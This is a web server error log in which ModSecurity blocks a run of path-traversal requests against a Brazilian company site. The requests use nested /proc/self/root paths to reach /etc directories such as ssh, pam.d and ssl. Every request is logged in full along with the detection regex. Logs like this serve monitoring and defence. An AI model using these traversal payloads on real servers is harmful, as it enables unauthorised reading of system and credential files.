[Tue Mar 17 08:49:57.940731 2026] [:error] [pid 1016:tid 140411590858496] [client 74.7.241.46:60024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_5ZqmL8PQht4WJFlCHgAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:49:57.944743 2026] [:error] [pid 2325:tid 140411624429312] [client 74.7.243.203:54726] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_5e82sZHvlq4xgHq90AAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:59.221793 2026] [:error] [pid 1016:tid 140411725141760] [client 74.7.243.203:54734] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_55qmL8PQht4WJFlCHwAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:59.293063 2026] [:error] [pid 11293:tid 140411582465792] [client 74.7.241.46:38282] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_59CmCSWTlPouqorGNwAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:01.671945 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.241.46:38294] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_6AeiSKl8TjouI-b8dQAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:01.675675 2026] [:error] [pid 1016:tid 140411540502272] [client 74.7.243.203:60006] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_6JqmL8PQht4WJFlCIgAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:04.016032 2026] [:error] [pid 1016:tid 140411599251200] [client 74.7.243.203:60008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_7JqmL8PQht4WJFlCJAAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:04.217939 2026] [:error] [pid 1961:tid 140411632822016] [client 74.7.241.46:38302] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_7HRXaaWotPICgYsfSQAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:05.383389 2026] [:error] [pid 1961:tid 140411674785536] [client 74.7.243.203:60014] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_7XRXaaWotPICgYsfSwAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:05.566543 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.241.46:38314] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_7QeiSKl8TjouI-b8dwAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:06.697792 2026] [:error] [pid 11469:tid 140411741927168] [client 74.7.243.203:60016] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_7pDEJR9VXonE_-1IhQAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:06.766855 2026] [:error] [pid 1210:tid 140411607643904] [client 74.7.241.46:38318] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_7lKJy4A1bGlmj9BQAAAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:08.114279 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.241.46:58726] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_8NCmCSWTlPouqorGPQAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:09.263234 2026] [:error] [pid 2325:tid 140411582465792] [client 74.7.241.46:58738] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_8e82sZHvlq4xgHq90gAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:10.314183 2026] [:error] [pid 7000:tid 140411658000128] [client 74.7.243.203:60032] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_8hePVOt35XCGZP8qQQAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:10.630101 2026] [:error] [pid 2305:tid 140411548894976] [client 74.7.241.46:58750] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_8gQohV2v-7oj5HH1tAAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:11.695284 2026] [:error] [pid 1961:tid 140411691570944] [client 74.7.243.203:48996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_83RXaaWotPICgYsfTgAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:11.959425 2026] [:error] [pid 7000:tid 140411641214720] [client 74.7.241.46:58766] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_8xePVOt35XCGZP8qQwAAA4w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:13.091122 2026] [:error] [pid 7000:tid 140411557287680] [client 74.7.243.203:49004] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_9RePVOt35XCGZP8qRAAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:13.363511 2026] [:error] [pid 2325:tid 140411683178240] [client 74.7.241.46:58776] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_9e82sZHvlq4xgHq91AAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:14.452699 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.243.203:49008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_9qBJNF7axNlVR0X3xQAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
